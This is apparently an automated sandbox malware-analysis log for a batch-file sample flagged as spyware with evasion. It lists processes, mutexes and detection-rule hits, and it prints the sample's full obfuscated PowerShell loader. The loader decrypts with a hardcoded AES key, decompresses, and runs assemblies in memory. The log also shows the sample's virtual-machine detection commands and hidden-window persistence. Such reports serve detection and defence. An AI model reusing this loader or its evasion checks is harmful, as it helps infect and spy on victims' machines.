Source: C:\Windows\System32\conhost.exeCode function: 20_3_000002BCD7E023F020_3_000002BCD7E023F0
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3DA1820_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3D89420_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E32FF020_2_000002BCD7E32FF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8BE3D236_2_00007FFD9B8BE3D2
Source: C:\Windows\System32\conhost.exeCode function: 37_3_0000026504E7CE1837_3_0000026504E7CE18
Source: C:\Windows\System32\conhost.exeCode function: 37_3_0000026504E7CC9437_3_0000026504E7CC94
Source: C:\Windows\System32\conhost.exeCode function: 37_3_0000026504E723F037_3_0000026504E723F0
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EADA1837_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EAD89437_2_0000026504EAD894
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EA2FF037_2_0000026504EA2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000025DC1A9CC9438_3_0000025DC1A9CC94
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000025DC1A923F038_3_0000025DC1A923F0
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000025DC1A9CE1838_3_0000025DC1A9CE18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140001CF038_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002D4C38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_000000014000320438_2_0000000140003204
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_000000014000243438_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_000000014000127438_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACD89438_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1AC2FF038_2_0000025DC1AC2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACDA1838_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CED89438_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CE2FF038_2_0000025DC1CE2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CEDA1838_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_00000225DC61CE1839_3_00000225DC61CE18
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_00000225DC6123F039_3_00000225DC6123F0
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_00000225DC61CC9439_3_00000225DC61CC94
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64DA1839_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC642FF039_2_00000225DC642FF0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64D89439_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67DA1839_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC672FF039_2_00000225DC672FF0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67D89439_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exeCode function: 40_3_00000202C0ABCE1840_3_00000202C0ABCE18
Source: C:\Windows\System32\lsass.exeCode function: 40_3_00000202C0ABCC9440_3_00000202C0ABCC94
Source: C:\Windows\System32\lsass.exeCode function: 40_3_00000202C0AB23F040_3_00000202C0AB23F0
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AEDA1840_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AED89440_2_00000202C0AED894
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AE2FF040_2_00000202C0AE2FF0
Source: C:\Windows\System32\svchost.exeCode function: 41_3_000002A6612DCE1841_3_000002A6612DCE18
Source: C:\Windows\System32\svchost.exeCode function: 41_3_000002A6612D23F041_3_000002A6612D23F0
Source: C:\Windows\System32\svchost.exeCode function: 41_3_000002A6612DCC9441_3_000002A6612DCC94
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130DA1841_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A661302FF041_2_000002A661302FF0
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130D89441_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAEDBCE1842_3_000002BAAEDBCE18
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAEDB23F042_3_000002BAAEDB23F0
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAEDBCC9442_3_000002BAAEDBCC94
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAED8CE1842_3_000002BAAED8CE18
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAED823F042_3_000002BAAED823F0
Source: C:\Windows\System32\dwm.exeCode function: 42_3_000002BAAED8CC9442_3_000002BAAED8CC94
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCDA1842_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDC2FF042_2_000002BAAEDC2FF0
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCD89442_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4DA1842_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE42FF042_2_000002BAAEE42FF0
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4D89442_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exeCode function: 43_3_0000026A8799CC9443_3_0000026A8799CC94
Source: C:\Windows\System32\svchost.exeCode function: 43_3_0000026A879923F043_3_0000026A879923F0
Source: C:\Windows\System32\svchost.exeCode function: 43_3_0000026A8799CE1843_3_0000026A8799CE18
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CD89443_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879C2FF043_2_0000026A879C2FF0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CDA1843_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4D89443_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F42FF043_2_0000026A87F42FF0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4DA1843_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_3_000001795377CE1844_3_000001795377CE18
Source: C:\Windows\System32\svchost.exeCode function: 44_3_000001795377CC9444_3_000001795377CC94
Source: C:\Windows\System32\svchost.exeCode function: 44_3_00000179537723F044_3_00000179537723F0
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537ADA1844_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537AD89444_2_00000179537AD894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537A2FF044_2_00000179537A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DDA1844_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DD89444_2_00000179537DD894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537D2FF044_2_00000179537D2FF0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_3_0000016CE5E2CC9445_3_0000016CE5E2CC94
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_3_0000016CE5E223F045_3_0000016CE5E223F0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_3_0000016CE5E2CE1845_3_0000016CE5E2CE18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653DA1845_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE6532FF045_2_0000016CE6532FF0
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653D89445_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exeCode function: 46_3_000002295D53CE1846_3_000002295D53CE18
Source: C:\Windows\System32\svchost.exeCode function: 46_3_000002295D53CC9446_3_000002295D53CC94
Source: C:\Windows\System32\svchost.exeCode function: 46_3_000002295D5323F046_3_000002295D5323F0
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56DA1846_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56D89446_2_000002295D56D894
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D562FF046_2_000002295D562FF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
Source: unknownProcess created: Commandline size = 5344
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2674Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682Jump to behavior
Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}d
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.drBinary string: \Device\NetbiosSmb
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.50.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.50.drBinary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.50.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.50.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.50.drBinary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.drBinary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engineClassification label: mal100.spyw.evad.winCMD@55/94@1/1
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,38_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,35_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,35_2_004017A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20241004Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\2820930
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\4817770
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4828
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\6260321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 1.cmdVirustotal: Detection: 14%
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
